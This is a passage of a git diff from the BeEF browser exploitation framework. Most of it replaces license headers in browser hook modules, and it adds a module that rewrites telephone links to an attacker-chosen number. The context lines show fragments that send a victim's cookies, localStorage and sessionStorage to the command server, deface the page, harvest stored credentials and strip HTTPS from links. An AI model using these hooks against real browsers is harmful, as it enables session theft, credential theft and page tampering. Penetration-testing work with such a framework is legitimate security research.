- http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { document.body.innerHTML = "<%= @deface_content %>"; diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml index 8d57a6cfe..ff51d8082 100644 --- a/modules/browser/hooked_domain/deface_web_page/config.yaml +++ b/modules/browser/hooked_domain/deface_web_page/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb index ec5affdfc..e05b14404 100644 --- a/modules/browser/hooked_domain/deface_web_page/module.rb +++ b/modules/browser/hooked_domain/deface_web_page/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Deface_web_page < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/get_cookie/command.js b/modules/browser/hooked_domain/get_cookie/command.js index 7f0049186..93ae9ec01 100644 --- a/modules/browser/hooked_domain/get_cookie/command.js +++ b/modules/browser/hooked_domain/get_cookie/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml index a5670e31e..f63a389dd 100644 --- a/modules/browser/hooked_domain/get_cookie/config.yaml +++ b/modules/browser/hooked_domain/get_cookie/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_cookie/module.rb b/modules/browser/hooked_domain/get_cookie/module.rb index ba0fc1350..81061bc89 100644 --- a/modules/browser/hooked_domain/get_cookie/module.rb +++ b/modules/browser/hooked_domain/get_cookie/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_cookie < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/get_local_storage/command.js b/modules/browser/hooked_domain/get_local_storage/command.js index 72db98fd6..47ed1855b 100644 --- a/modules/browser/hooked_domain/get_local_storage/command.js +++ b/modules/browser/hooked_domain/get_local_storage/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if ('localStorage' in window && window['localStorage'] !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify(window['localStorage'])); diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml index f008244b3..00e8e7f37 100644 --- a/modules/browser/hooked_domain/get_local_storage/config.yaml +++ b/modules/browser/hooked_domain/get_local_storage/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_local_storage/module.rb b/modules/browser/hooked_domain/get_local_storage/module.rb index fd57f511e..c65b063c0 100644 --- a/modules/browser/hooked_domain/get_local_storage/module.rb +++ b/modules/browser/hooked_domain/get_local_storage/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_local_storage < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/get_page_html/command.js b/modules/browser/hooked_domain/get_page_html/command.js index 51926584c..2151880a2 100644 --- a/modules/browser/hooked_domain/get_page_html/command.js +++ b/modules/browser/hooked_domain/get_page_html/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { try { diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml index a4e51a376..0f86badae 100644 --- a/modules/browser/hooked_domain/get_page_html/config.yaml +++ b/modules/browser/hooked_domain/get_page_html/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_page_html/module.rb b/modules/browser/hooked_domain/get_page_html/module.rb index 6ef33ad89..2d2eecac8 100644 --- a/modules/browser/hooked_domain/get_page_html/module.rb +++ b/modules/browser/hooked_domain/get_page_html/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_page_html < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/get_page_links/command.js b/modules/browser/hooked_domain/get_page_links/command.js index 9f12337ac..0af4ca888 100644 --- a/modules/browser/hooked_domain/get_page_links/command.js +++ b/modules/browser/hooked_domain/get_page_links/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "links="+beef.dom.getLinks()); diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml index 1b1ed13f3..d316522a2 100644 --- a/modules/browser/hooked_domain/get_page_links/config.yaml +++ b/modules/browser/hooked_domain/get_page_links/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_page_links/module.rb b/modules/browser/hooked_domain/get_page_links/module.rb index c8c005c96..66c639ebd 100644 --- a/modules/browser/hooked_domain/get_page_links/module.rb +++ b/modules/browser/hooked_domain/get_page_links/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_page_links < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/get_session_storage/command.js b/modules/browser/hooked_domain/get_session_storage/command.js index 9e23c3c9e..13346737e 100644 --- a/modules/browser/hooked_domain/get_session_storage/command.js +++ b/modules/browser/hooked_domain/get_session_storage/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if ('sessionStorage' in window && window['sessionStorage'] !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify(window['sessionStorage'])); diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml index 39d1cff08..5f54cb91c 100644 --- a/modules/browser/hooked_domain/get_session_storage/config.yaml +++ b/modules/browser/hooked_domain/get_session_storage/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_session_storage/module.rb b/modules/browser/hooked_domain/get_session_storage/module.rb index 6b75c2eeb..40a196ae8 100644 --- a/modules/browser/hooked_domain/get_session_storage/module.rb +++ b/modules/browser/hooked_domain/get_session_storage/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_session_storage < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/get_stored_credentials/command.js b/modules/browser/hooked_domain/get_stored_credentials/command.js index 948435a53..080b4e49e 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/command.js +++ b/modules/browser/hooked_domain/get_stored_credentials/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var form_data = new Array(); diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml index 1c01a0391..f610c5fca 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml +++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb index 243fddcbe..0e1277855 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/module.rb +++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_stored_credentials < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/link_rewrite/command.js b/modules/browser/hooked_domain/link_rewrite/command.js index 03c9ac917..75702b158 100644 --- a/modules/browser/hooked_domain/link_rewrite/command.js +++ b/modules/browser/hooked_domain/link_rewrite/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinks('<%= @url %>')+' links rewritten to <%= @url %>'); }); diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml index f458eb1e0..5c5cbecf8 100644 --- a/modules/browser/hooked_domain/link_rewrite/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/link_rewrite/module.rb b/modules/browser/hooked_domain/link_rewrite/module.rb index 9176a2173..dabb6f189 100644 --- a/modules/browser/hooked_domain/link_rewrite/module.rb +++ b/modules/browser/hooked_domain/link_rewrite/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Link_rewrite < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js index 9e68bc542..de3739f8d 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { selector = "a"; diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml index 176ec2f69..3ce3065b5 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb index 61d9e8969..f7e32b6b7 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Link_rewrite_sslstrip < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js new file mode 100644 index 000000000..355b7ec47 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js @@ -0,0 +1,15 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var tel_number = "<%= @tel_number %>"; + var selector = "a"; + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number); + +}); + diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml new file mode 100644 index 000000000..54c7ef2d9 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + link_rewrite_tel: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Replace HREFs (TEL)" + description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb new file mode 100644 index 000000000..58de13fb5 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Link_rewrite_tel < BeEF::Core::Command + + def self.options + return [ + { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js index 48cbdaab1..05d4a3354 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + var somethingsomething = function() { var fake_url = "<%= @fake_url %>"; var real_url = "<%= @real_url %>"; diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index b4a20fe33..72183d8b6 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,7 +14,7 @@ beef: target: working: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb index b5f95a712..5c35bc400 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 